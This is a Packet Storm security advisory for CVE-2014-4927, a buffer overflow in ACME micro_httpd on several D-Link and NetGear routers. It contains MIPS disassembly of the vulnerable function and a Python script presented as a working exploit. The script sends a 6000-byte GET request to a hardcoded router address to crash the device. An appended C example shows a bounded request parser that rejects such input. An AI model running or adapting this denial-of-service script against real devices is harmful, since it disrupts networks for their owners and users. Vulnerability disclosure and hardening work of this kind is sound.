ACME micro_httpd Denial Of Service

Published: 19 Jul 2014 00:00:00
Reported by: Yuval tisf Nativ
Type: packetstorm
Source: packetstormsecurity.com

Buffer Overflow in micro_httpd by ACME, Denial Of Service

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | ACME micro_httpd - Denial of Service | 18 Jul 2014 00:00 | zdt |
| CVE | CVE-2014-4927 | 24 Jul 2014 14:00 | cve |
| Cvelist | CVE-2014-4927 | 24 Jul 2014 14:00 | cvelist |
| Exploit DB | ACME micro_httpd - Denial of Service | 18 Jul 2014 00:00 | exploitdb |
| exploitpack | ACME micro_httpd - Denial of Service | 18 Jul 2014 00:00 | exploitpack |
| NVD | CVE-2014-4927 | 24 Jul 2014 14:55 | nvd |
| OSV | UBUNTU-CVE-2014-4927 | 24 Jul 2014 14:55 | osv |
| Prion | Buffer overflow | 24 Jul 2014 14:55 | prion |
| Positive Technologies | PT-2014-6212 · NetGear +2 · Netgear Mr-Adsl-Dg834 +4 | 24 Jul 2014 00:00 | ptsecurity |
| UbuntuCve | CVE-2014-4927 | 24 Jul 2014 14:55 | ubuntucve |
```python
"""
# Exploit Title: Buffer Overflow in micro_httpd by ACME
# Date: 4/7/2014
# Exploit Author: Yuval tisf Nativ
# Vendor Homepage: http://www.acme.com/software/micro_httpd/
# Software Link: http://www.acme.com/software/micro_httpd/
# Version: June 2012
# CVE: CVE-2014-4927
# Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)

Buffer Overflow in micro_httpd

Argument for GET method is vulnerable to a buffer overflow.
Analyzed on:
D-Link: DSL2750U, DSL2740U,
NetGear: WGR614, MR-ADSL-DG834

ACME Labs offers no version tracking on server versions, so the version
might not be accurate.

MIPS disassembly of the vulnerable flow:
sub_4067CC:

LOAD:004067CC
LOAD:004067CC lui $gp, 0x47
LOAD:004067D0 addiu $sp, -0xA0
LOAD:004067D4 li $gp, 0x46B850
LOAD:004067D8 sw $ra, 0xA0+var_4($sp)
LOAD:004067DC sw $s3, 0xA0+var_8($sp)
LOAD:004067E0 sw $s2, 0xA0+var_C($sp)
LOAD:004067E4 sw $s1, 0xA0+var_10($sp)
LOAD:004067E8 sw $s0, 0xA0+var_14($sp)
LOAD:004067EC sw $gp, 0xA0+var_88($sp)
LOAD:004067F0 lui $s0, 0x46
LOAD:004067F4 lw $v1, dword_464108
LOAD:004067F8 lw $t9, (off_463B24 - 0x46B850)($gp)
LOAD:004067FC move $v0, $a0
LOAD:00406800 sw $a1, 0xA0+var_90($sp)
LOAD:00406804 move $s2, $a2
LOAD:00406808 lui $a1, 0x44
LOAD:0040680C lui $a2, 0x44
LOAD:00406810 move $a0, $v1
LOAD:00406814 la $a1, aSDS # "%s %d %s\r\n"
LOAD:00406818 la $a2, aHttp1_1 # "HTTP/1.1"
LOAD:0040681C move $s1, $a3
LOAD:00406820 jalr $t9
LOAD:00406824 move $a3, $v0
LOAD:00406828 lw $gp, 0xA0+var_88($sp)
LOAD:0040682C lw $a0, dword_464108
LOAD:00406830 lw $t9, (off_463B24 - 0x46B850)($gp)
LOAD:00406834 lui $a2, 0x44
LOAD:00406838 lui $a1, 0x44
LOAD:0040683C la $a2, aMicro_httpd # "micro_httpd"
LOAD:00406840 jalr $t9
LOAD:00406844 la $a1, aServerS # "Server: %s\r\n"
LOAD:00406848 lw $gp, 0xA0+var_88($sp)
LOAD:0040684C lw $a1, 0x4108($s0)
LOAD:00406850 lw $t9, (off_463BCC - 0x46B850)($gp)
LOAD:00406854 lui $a0, 0x44
LOAD:00406858 jalr $t9
LOAD:0040685C la $a0, aCacheControlNo # "Cache-Control: no-cache\r\n"
LOAD:00406860 lw $gp, 0xA0+var_88($sp)
LOAD:00406864 move $a0, $0
LOAD:00406868 lw $t9, (off_463CDC - 0x46B850)($gp)
LOAD:0040686C jalr $t9
LOAD:00406870 addiu $s3, $sp, 0xA0+var_7C
LOAD:00406874 lw $gp, 0xA0+var_88($sp)
LOAD:00406878 addiu $a0, $sp, 0xA0+var_80
LOAD:0040687C lw $t9, (off_463DF4 - 0x46B850)($gp)
LOAD:00406880 jalr $t9
LOAD:00406884 sw $v0, 0xA0+var_80($sp)
LOAD:00406888 lw $gp, 0xA0+var_88($sp)
LOAD:0040688C lui $a2, 0x44

Working Exploit for a Denial of Service:
"""

#!/bin/python
import socket
import struct

# This will crash the router.
# In some devices it takes about 10 minutes until functionality is restored.

buffer = "\x41" * 6000 # Original fuzzing buffer.
host = "10.0.0.138"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))

payload = "GET /" + buffer + " HTTP/1.1\r\n"
payload += "Host: %s \r\n\r\n" % host

s.send(payload)
s.close()
```
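A defensive counterpart to the overflow described above, as an added example that is not part of the original advisory and is not micro_httpd's own code: a request-line parser that bounds every token and answers an oversized GET argument with 414 instead of copying it. The size limits, the `struct request` layout and the function names are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits for illustration; not taken from micro_httpd. */
#define MAX_METHOD 8
#define MAX_TARGET 2048
#define MAX_PROTO  16

struct request {
    char method[MAX_METHOD + 1];
    char target[MAX_TARGET + 1];
    char proto[MAX_PROTO + 1];
};

/* Copy one space-delimited token of at most `cap` bytes into dst (NUL-terminated).
 * Returns its length, or -1 (leaving *p untouched) if it is empty or too long. */
static long take_token(const char **p, const char *end, char *dst, size_t cap)
{
    const char *s = *p, *e = s;
    while (e < end && *e != ' ' && *e != '\r' && *e != '\n')
        e++;
    size_t n = (size_t)(e - s);
    if (n == 0 || n > cap)
        return -1;                 /* length is checked before any copy */
    memcpy(dst, s, n);
    dst[n] = '\0';
    *p = (e < end && *e == ' ') ? e + 1 : e;
    return (long)n;
}

/* Parse "METHOD SP target SP HTTP-version CRLF" from buf[0..len).
 * Returns 0 on success, otherwise the HTTP status to send: 400 or 414. */
int parse_request_line(const char *buf, size_t len, struct request *req)
{
    const char *p = buf, *end = buf + len;
    if (take_token(&p, end, req->method, MAX_METHOD) < 0)
        return 400;
    if (take_token(&p, end, req->target, MAX_TARGET) < 0)   /* too long vs. missing */
        return (p < end && *p != ' ' && *p != '\r' && *p != '\n') ? 414 : 400;
    if (take_token(&p, end, req->proto, MAX_PROTO) < 0)
        return 400;
    if (req->target[0] != '/' || strncmp(req->proto, "HTTP/", 5) != 0)
        return 400;
    return 0;
}
int main(void) {   /* constructed sample request; exits 0 when it parses */
    struct request r; const char ok[] = "GET /index.html HTTP/1.1\r\n";
    return parse_request_line(ok, sizeof ok - 1, &r);
}
```

A request line carrying the 6000-byte argument from the advisory is rejected with 414 before any byte of the target is copied.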
